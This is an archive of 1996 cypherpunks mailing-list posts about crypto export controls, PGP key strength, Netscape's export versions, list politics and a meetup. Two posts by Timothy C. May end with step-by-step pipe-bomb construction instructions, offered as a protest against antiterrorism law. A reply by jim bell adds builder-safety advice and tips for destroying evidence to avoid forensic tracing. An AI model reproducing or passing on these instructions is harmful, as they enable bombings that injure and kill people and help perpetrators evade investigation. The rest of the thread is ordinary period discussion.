Message-ID: <199608012313.TAA12748@nrk.com>
MIME-Version: 1.0
Content-Type: text


> 
> Timothy C. May writes:
> 
> > This was a company in Bowie, Maryland, closely linked with the NSA and with
> > the "supercomputer centers." 
> 
> That's one of the things that killed Thinking Machines.  It turned out
> that a standard supercomputer with PIM chips for memory could give the
> same performance for less money.  

See:

http://cesdis.gsfc.nasa.gov/linux/beuwolf/beuwolf.html

Don is doing interesting things with less...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Fri, 2 Aug 1996 13:00:06 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
Message-ID: <199608020217.TAA22834@dfw-ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 01 Aug 1996, Gary Howland <gary@systemics.com> wrote:
>jim bell wrote:
>> 
>> At 07:49 PM 7/31/96 -0700, Timothy C. May wrote:
>> > 
>> >2. They found a _shotgun_ in his cabin.
>> 
>> No, no, Tim.   The proper way to deliver this to a TV audience is, "They
>> found an ARSENAL in his COMPOUND!"
>
>Alternatively, describe the shotgun as a 50 caliber cannon.
>
>Gary

[snip]

Actually, a 12-gage shotgun is approximately .73 caliber.  Maybe it was a 
16-gage?  BTW, many "real terrorist incidents" are acknowledged by the group 
committing them, so that they will win support for their "cause," or notoriety, 
or whatever other gratification their sick minds might derive from carnage.  The 
fact that no one has claimed responsibility for the bombing skews the 
perpetrator probabilities more toward a single disturbed individual or a 
Reichstag rehash.

Ernest Hua (hua@chromatic.com) wrote:
>: How does one verify that an IP address is coming from a U.S. site?
>: How do most FTP site (e.g. those which carry crypto) determine the
>: origins of a connection?

>What's the use ? It makes it only nominally more difficult to access
>an US crypto site, one needs first to esthablish an US beachhead ie.
>open an US account, and ftp the eleet crypto warez using the newly
>created US account as an intermediary. 

>So the next step will be a tag that a user is an 'alien' ?
[snip]

The chupa-cabras, Grays, and the Art Bell Fan Club would file an EEOC 
class-action lawsuit, citing preferential treatment for beings that "the average 
citizen" actually BELIEVES in.  More lawyer-bait.
Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 2 Aug 1996 10:21:30 +0800
To: tomw@netscape.com (Tom Weinstein)
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <320101B9.500F@netscape.com>
Message-ID: <199608012327.TAA12824@nrk.com>
MIME-Version: 1.0
Content-Type: text



Tom Weinstein writes:

> We only ship the domestic version to addresses inside the US.  They
> State Department seems to think this is sufficient.  Of course, a
> foreign person can always fly here and pick up a copy at Fry's, but
> that's not our problem.

Or just walk out of a Mission, and buy one on K Street.

But it's easier to just get an account on an ISP.

I recall several chats with a .nl UN Mission Staffer. He was on
Panix or PSI or such. Maybe we should require proof of citizenship
before granting a license to use IP.

(The irony was, he did not realize the Vienna Convention
covered his rented residence as well as the Mission...)


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 2 Aug 1996 10:30:45 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Bombs & bomb threats in LA
In-Reply-To: <01I7RKOB77H48Y4XIK@mbcl.rutgers.edu>
Message-ID: <199608012350.TAA12975@nrk.com>
MIME-Version: 1.0
Content-Type: text


> What, precisely, is an acid bomb? 

It may be:
	acid delay fuse;
or
	a "spray acid around" device...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 2 Aug 1996 11:29:18 +0800
To: usura@replay.com
Subject: Re: crypto CD source
In-Reply-To: <199607311213.OAA19633@basement.replay.com>
Message-ID: <199608011855.TAA02027@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Alex de Joode <usura@replay.com> writez:
> [..]
> : They have a large supply of crypto software available on-line as well.
> : (No mention of ITAR on their software down load pages (78 Mb of
> : security related software they claim), and it looks you could download
> : the lot even if you weren't in the US).
> 
> ftp.replay.com has 220 Mb of crypto software available for download
> at no charge ....

I didn't make clear: their was no charge for down loading their
on-line stuff.  I think they are in the US, and mentioned their crypto
down load as having no restrictions because of the ITAR implications.

Just wondering if anyone outside the US had downloaded `PGP262.ZIP'
from their freely accessible ftp area.

I get my crypto from US sites also, and your's is on the list :-)

	ftp.dsi.unimi.it
	ftp.ox.ac.uk
	ftp.replay.com
	http://www.cs.hut.fi/crypto/

(a few more too that's all I can remember off the top of my head).

Now if their CD cost $10, and they weren't in the US, I might've
bought one.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Fri, 2 Aug 1996 13:45:25 +0800
To: cypherpunks@toad.com
Subject: Re:  Is 1024-bit PGP key enough?
Message-ID: <199608020305.UAA11868@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> But the original author also needs to step back and understand his
> security needs.  In particular, if you're trying to protect your
> information against an enemy who is willing to spend $10B to get it,
> they'll have a lot of options other than hiding in a back room with some
> cracking equipment.  Would you be willing to sell them the information
> you're trying to protect for (say) 10% of that $10B?  Would your partner?
> Your wife?

The idea is simple. Since it is easy to increase the size of the
pgp key -- certainly easier than improving my wife -- it is not
uneconomical to be a little overly paranoid over the size of my
key. All it costs me is a couple of seconds of CPU time!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 2 Aug 1996 13:49:09 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: The "Secure" version of Netscape for Linux is *NOT*
Message-ID: <2.2.32.19960802033114.00e9ed38@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 PM 8/1/96 -0700, Tom Weinstein wrote:
>Alan Olsen wrote:
>> 
>> I just installed the "secure" version of Netscape off of the "US Only"
>> download site.
>> 
>> Seems that it is actualy the international version and not the 128 bit
>> version.
>
>What makes you think you got the export version?
>
>Here's one way to find out.  If you look in the Security Preferences
>panel under the Options menu, there are two "Configure" buttons for
>configuring what ciphers are enabled for SSL 2 and SSL 3.  The domestic
>version supports a greater variety of options, including triple DES.

I connected to my site running Stronghold 1.3b1.  Only got 40 bit
encryption.  I then connected to Netscape's Store site.  Only got 40 bit
encryption.  I checked the info box (or about box, I don't remember which)
for the connection and it claimed to be running the "exportable" version.
(The Win95 version connects properly to both sites with no tweaking needed.)

I will double check, but neither site would connect with 128 bits straight
out of the tar file.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 2 Aug 1996 12:28:08 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: Tolerance
In-Reply-To: <199608012148.OAA21170@cygnus.com>
Message-ID: <32015C84.4775@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Chris Adams wrote:
> 
> Just a comment to all of the 'true libertarians' out there

What does being a libertarian, or true libertarian, have to do with
wanting Sternlight on the list?

I strongly suspect you have a dramatic misunderstanding of 
libertarianism.

> Sternlight's recent membership?

For what it's worth, I had no problem with D.S. being on the list.  That
opinion has very, very little to do with my libertarian leanings, I assure
you.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 2 Aug 1996 12:19:29 +0800
To: wb8foz@nrk.com
Subject: Re: Bombs & bomb threats in LA
In-Reply-To: <199608012350.TAA12975@nrk.com>
Message-ID: <32015CE7.3EF0@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher wrote:
> 
> > What, precisely, is an acid bomb?
> 
> It may be:
>         acid delay fuse;
> or
>         a "spray acid around" device...

Remember what Friday said on Dragnet:

	Marijuana is the match,
		Heroin is the fuse,
			And LSD is the BOMB.

Maybe that's what they meant.
	
______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 14:10:23 +0800
To: cypherpunks@toad.com
Subject: Pipe bombs
Message-ID: <ae26cc41120210042fbf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



So now we are to spend the next six or eight months putting instructions on
how to build pipe bombs in our .sigs, reading endless analyses of how the
"Antiterrorism and Safety Act of 1996" is unconstitutional, following the
CDA-type emergency challenge mounted by VTW/ACLU/NRA, and wondering who
will be arrested first.

Fuck them. Fuck Swinestein, Klinton, Gingrich, and all the rest. And fuck
Dole. (On second thought, don't--it might not be a survivable experience.)

I say they've all earned only our contempt.

It's time to accelerate our efforts to undermine this foolish experiment in
pandering to the masses.

--Tim May

Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack
the powder. Don't even tap the bottom of the pipe to make it settle.  You want
the powder loose.  For maximum explosive effect, you need dry, fine powder
sitting loose in a very rigid container.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 14:34:36 +0800
To: cypherpunks@toad.com
Subject: Southern Cracker Beer Bombs in Trucks
Message-ID: <ae26d13d140210045b7e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 8/1/96, Joey Grasty wrote:
>* All joking aside, Jim is a very fine brewmaster.  I just wish
>he'd spend a few bucks and ferment in something other than 2 liter
>coke bottles that explode in someone's truck...

"Explode"?

Is this one of those southern cracker beer bombs?

Let's see...circumstantially, we've got:

- a southerner

- a truck

- an explosion

I'd say that if Jim is either overweight or has ever fired a gun, we've got
an arrest before dawn. But we've got to hurry--NBC wants Katie Couric
present at the bust.

--Louis Freeh


Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack
the powder. Don't even tap the bottom of the pipe to make it settle.  You want
the powder loose.  For maximum explosive effect, you need dry, fine powder
sitting loose in a very rigid container.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Fri, 2 Aug 1996 08:42:27 +0800
To: cypherpunks@toad.com
Subject: PCC_war
Message-ID: <199608012131.VAA06059@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-29-96. EBNews: 
 
   "Encryption ICs Enable Ironclad Net Security." 
 
      New encryption ICs on PCMCIA cards will be unveiled 
      imminently to allow PC users to make transactions over 
      the Internet with ironclad security. "This will open up 
      electronic commerce pervasively and launch a new market 
      for PCs," said TIS's Bill Sweet. Both National 
      Semiconductor and VLSI Technology plan to unveil 
      affordable chips shortly for PCMCIA encryption cards. 
 
      National's thumb-scan project, which aims to provide an 
      additional security factor, is a joint effort with 
      Identix. In this system, a holographic laser chip on the 
      card would image a portion of the holder's thumbprint. 
      That image will be compared with the holder's digital 
      thumbprint pattern stored on a memory chip in the card. 
 
   7-31-96. Jane's: 
 
   "Future Warfare | Rise of the robots." 
 
      A US Defense Science Board (DSB) task force is putting 
      the final touches to a study that members promise will 
      be one of the most controversial ever produced by the 
      panel. The next century adversary will aggressively use 
      offensive information warfare, rely on underground and 
      covert urban facilities and have some ability to attack 
      low earth orbiting satellites. It will require a 
      "revolution in military affairs" achieved through 
      enhanced surveillance capabilities, weapons of mass 
      destruction, thousands of inexpensive missiles, a few 
      very low observable cruise missiles, mines and diesel 
      submarines. 
 
      The only aspect of tactics and technology that everyone 
      in the DoD seems to agree on is that the most important 
      developments for warfighting over the next 10 to 20 
      years will be related to information systems. 
 
   ----- 
 
   http://jya.com/pccwar.txt  (19 kb for 2) 
 
   PCC_war 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Fri, 2 Aug 1996 12:43:46 +0800
To: jim@ACM.ORG
Subject: Re: Is 1024-bit PGP key enough?
Message-ID: <2.2.32.19960802021606.00697f50@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 15:38 08/01/96 PDT, Jim Gillogly wrote:
>
>Somebody says:
>>> Is security provided by 1024-bit PGP key sufficient against most powerful
>>> computers that are available today? Say if smoe organization spent 10
>>> billions of dollars on a cracking machine, would it be possible to crack 
>>> the keys in reasonable time?
>
>Derek Atkins <warlord@MIT.EDU> responds with some useful and authoritative
>information -- thanks.
>
Also, remember that although the PGP key is 1024 bits, it generates a much
smaller IDEA key with 56 bits (I think... anyone?).  The 56 bit key is
vunerable to that $1 mil mystery machine that the NSA may or may not have.
 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      | 
 |          and on a plethora of key servers around the world.          |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 2 Aug 1996 07:32:54 +0800
To: cypherpunks@toad.com
Subject: Is 1024-bit PGP key enough?
Message-ID: <199608012016.WAA00739@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Is security provided by 1024-bit PGP key sufficient against most powerful
computers that are available today? Say if smoe organization spent 10
billions of dollars on a cracking machine, would it be possible to crack 
the keys in reasonable time?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 2 Aug 1996 13:05:17 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Tolerance
In-Reply-To: <199608012148.OAA21170@cygnus.com>
Message-ID: <Pine.LNX.3.95.960801221910.5827A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 1 Aug 1996, Chris Adams wrote:

> Just a comment to all of the 'true libertarians' out there, especially
> the "defend to the death" types:  How many of you defended Mr.
> Sternlight's recent membership?

I had absolutely no problem with Sternlight subscribing to cpunks.  In fact,
I would be opposed to any action that attempted to remove him from the list.
I also have the right to killfile whomever I want to, and I will defend that
right, also.  However, if cpunks was a "closed" list with a definitive charter,
I would not be displeased with any of the list owners who would prevent David
Sternlight from subscribing or posting to the list.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMgFnUrZc+sv5siulAQGY3AP9GngPhL570IceIr+Ls8OaE3gIrTRWQVU6
4gvozv/4g0nEUmT/S+KcnM5ySIQACB2E8LlwG8F2Fb8fLHquywS9Ql28mwx0oCfY
OjO/hycM4UGGx5W0nGli8dJ95mpzIm9VDZNsRbrIPKbo8s5bi55Dlx9BwsG28PY5
BVKWCMk+U/g=
=mSZs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 2 Aug 1996 20:46:16 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: The "Secure" version of Netscape for Linux is *NOT*
Message-ID: <2.2.32.19960802054049.00b19604@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:31 PM 8/1/96 -0700, Alan Olsen wrote:
>At 05:25 PM 8/1/96 -0700, Tom Weinstein wrote:
>>Alan Olsen wrote:
>>> 
>>> I just installed the "secure" version of Netscape off of the "US Only"
>>> download site.
>>> 
>>> Seems that it is actualy the international version and not the 128 bit
>>> version.
>>
>>What makes you think you got the export version?
>>
>>Here's one way to find out.  If you look in the Security Preferences
>>panel under the Options menu, there are two "Configure" buttons for
>>configuring what ciphers are enabled for SSL 2 and SSL 3.  The domestic
>>version supports a greater variety of options, including triple DES.
>
>I connected to my site running Stronghold 1.3b1.  Only got 40 bit
>encryption.  I then connected to Netscape's Store site.  Only got 40 bit
>encryption.  I checked the info box (or about box, I don't remember which)
>for the connection and it claimed to be running the "exportable" version.
>(The Win95 version connects properly to both sites with no tweaking needed.)
>
>I will double check, but neither site would connect with 128 bits straight
>out of the tar file.

My apologies to everyone involved!

I fucked up!

There was a period of time between when I downloaded and when I installed.
The version I installed was not the one I installed from the secure site.
(I had thought I had not downloaded the 3.0b5 version for Linux, except for
the secure version.  It seems that I had downloaded it when the first
version of 3.0b5 came out, not the 3.0b5a version...)

Sorry again!

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Aug 1996 19:06:36 +0800
To: cypherpunks@toad.com
Subject: Re: Southern Cracker Beer Bombs in Trucks
Message-ID: <199608020607.XAA14971@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 PM 8/1/96 -0700, Timothy C. May wrote:

>Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
>ends.  Buy two metal caps to fit.  These are standard items in hardware
>stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
>good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
>on one end. Fill the pipe to within 1/2 inch of the top with black powder.
>Do not pack
>the powder. Don't even tap the bottom of the pipe to make it settle.  You want
>the powder loose.  For maximum explosive effect, you need dry, fine powder
>sitting loose in a very rigid container.

For "safety" purposes (at least for the builder!) I would add that the 
threads on the pipe should be covered with a generous quantity of vaseline, 
grease, wax, or other similar material.  Otherwise, the final tighten-up 
might cause an explosion if granules of powder get stuck in the threads and 
ignite due to friction.


Evidence reduction tips:  

Discard drill bit used to make hole in pipe.  Carefully avoid leaving any 
drill shavings in work area.

Completely use/discard any extra powder/fuse not used in the bomb.  
(Chemical analysis will reveal similarity...)

When tightening the pipe/cap, shield the work with a thick layer of 
folded-up paper towel or other material, so your Vice-Grips (or other such 
wrench, or vice) don't leave "tool marks" on the pipe.  (Discard, by burning, such paper after use.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 2 Aug 1996 13:45:34 +0800
To: cypherpunks@toad.com
Subject: South Florida Cypherpunks Meeting
Message-ID: <199608020315.XAA66046@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

The South Florida Cypherpunks will meet at Hops Grill & Bar
in Boynton Beach, FL on Saturday, August 17 at 2:00 PM.  As
always, our meeting place is at a microbrewery, and this one
has some very fine brews.

In addition, the Cypherpunks Brewmaster, Jim Ray, is brewing 
up a special "summer dark" brew for the meeting.  We will 
enjoy his swill^H^H^H^H^Hfine beer at my house following the
meeting.*

I'll post directions to Hops as we get closer to the meeting
time and put a map on my web page at:

  http://www.c2.net/~winsock/

Please send me a note if you plan to attend so that I can alert
the NSA^H^H^Hrestaurant on how many will attend.  Send me your
key and fingerprint for keysigning if it hasn't been signed by any
subversives^H^H^H^H^H^H^H^H^Hcypherpunks before.

* All joking aside, Jim is a very fine brewmaster.  I just wish
he'd spend a few bucks and ferment in something other than 2 liter
coke bottles that explode in someone's truck...

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 2 Aug 1996 15:59:07 +0800
To: cypherpunks@toad.com
Subject: An example of KKKlintonista harrassment and censorship
In-Reply-To: <199608020040.RAA24954@dfw-ix6.ix.netcom.com>
Message-ID: <P0k1RD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From mwohler@ix.netcom.com  Thu Aug  1 20:40:35 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Thu, 01 Aug 96 22:34:41 EDT
	for dlv
Received: from [206.214.98.6] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA25392 for dlv@bwalk.dm.com; Thu, 1 Aug 96 20:40:35 -0400
Received: from Marc's Station (nyc-ny20-18.ix.netcom.com [205.186.166.210]) by dfw-ix6.ix.netcom.com (8.6.13/8.6.12) with SMTP id RAA24954 for <dlv@bwalk.dm.com>; Thu, 1 Aug 1996 17:40:33 -0700
Message-Id: <199608020040.RAA24954@dfw-ix6.ix.netcom.com>
X-Sender: mwohler@popd.ix.netcom.com
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 01 Aug 1996 20:42:45 -0400
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Subject: RE:Clinton is a terrorist and a murderer.

At 05:22 PM 8/1/96 EDT, you wrote:
>"Marc J. Wohler" <mwohler@ix.netcom.com> writes:
>
>> At 10:43 PM 7/29/96 EDT, you wrote:
>>
>> >Clinton is a terrorist and a murderer.
>>
>> Can you explain or expand on this?
>>
>
>How much will you pay me for my time?

Just as  I suspected.*Ignorant bullshit*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 2 Aug 1996 09:55:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Internal Passports
In-Reply-To: <ae26305c070210048f37@[205.199.118.202]>
Message-ID: <3201257B.31D2DE92@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Having a "Privacy Ombudsman" is a bone thrown to the proles. I suspect a
> police state like Singapore has such a person.
> 
> And related to the "photo I.D." discussion, most of these nations demand
> that passports be left at hotel desks when checking in. (At least they did
> when I spent 6 weeks travelling through Europe in 1983.) Perhaps the theory
> is that this stops people from running out on their bills, though credit
> cards do the same thing (*). However, the police reportedly inspect these
> passports and enter them into data bases to track movements.

Many still do.  Even ski hire shops in France require a passport, credit
card
or drivers licence to be _left_ with the shop (even hire car companies
don't
do this! - I suppose they've figured out you need your driving licence
...)

I was recently at a hotel in the Netherlands, and they required me to
fill
out a form asking for date and place of birth, passport number etc. etc.
I asked "What do you want this for?" and they replied "Oh, don't worry,
it's not for us, it's for the government"!!!  I look around me at the
dozen
or so people happily giving away these details, including my girlfriend
who later has to be given a lesson on misinformation ... (am I the only
one who fills out every form as Alexei Sayle with bad handwriting?)

Alexei
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Aug 1996 20:34:13 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Viet Nam Considered Less Harmful than Cambodia
In-Reply-To: <ae26a67e0f021004507b@[205.199.118.202]>
Message-ID: <Pine.GUL.3.95.960802000239.27368C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Timothy C. May wrote:

> --Tim May, who wonders if anyone with access to the Net will become part of
> the mountains of skulls in Pax Americana

I once gave an account on my workstation to a Jesuit priest who was later
assassinated in El Salvador, but it was mostly for access to a few things,
not really "on the net." Does that count?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 2 Aug 1996 14:29:31 +0800
To: gcg@pb.net>
Subject: Re: Is 1024-bit PGP key enough?
In-Reply-To: <2.2.32.19960802021606.00697f50@mail.pb.net>
Message-ID: <Pine.LNX.3.95.960802001105.5991A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 1 Aug 1996, Geoffrey C. Grabow wrote:

> Also, remember that although the PGP key is 1024 bits, it generates a much
> smaller IDEA key with 56 bits (I think... anyone?).  The 56 bit key is
> vunerable to that $1 mil mystery machine that the NSA may or may not have.

Nope.  The IDEA key is 128 bits long and is probably much harder to break than
a 3000-bit RSA modulus.  Of course, the comparison is really useless, since
nobody knows how advanced the NSA's factoring capabilities are.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMgGAtrZc+sv5siulAQGDSAP9HDXWsAPMzR/WUc29OLvYs+gg78HWsewH
raZSNPP+O80Kjub/K5vmvz83b227H6wapyzOQpeVByGu+IafKi74ZTO0KhkrMLdK
FX93eY0AKFYLU/PVgxGvTsIJt1SISK5URfSLhymYVbulW/Cevute7nHvf+ZmysHy
YEY6ZQhx3Eo=
=Veh2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 2 Aug 1996 19:59:05 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Is 1024-bit PGP key enough?
In-Reply-To: <199608012016.WAA00739@basement.replay.com>
Message-ID: <Pine.LNX.3.93.960802002837.833A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Anonymous wrote:

> Is security provided by 1024-bit PGP key sufficient against most powerful
> computers that are available today? Say if smoe organization spent 10
> billions of dollars on a cracking machine, would it be possible to crack 
> the keys in reasonable time?


     I'd bet if they wanted it that bad they'd spend a half million on 
buying the key.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 2 Aug 1996 20:02:11 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Again, disappointed in Gingrich
In-Reply-To: <01I7RL8DXKCK8Y4XIK@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.93.960802003342.833C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, E. ALLEN SMITH wrote:

> 	Again, I'm disappointed in Gingrich. This amplifies the earlier
> comments.
> 	-Allen
> >Clinton, congressional leaders to meet on terrorism
> >   _(c) Copyright 1996 Nando.net_
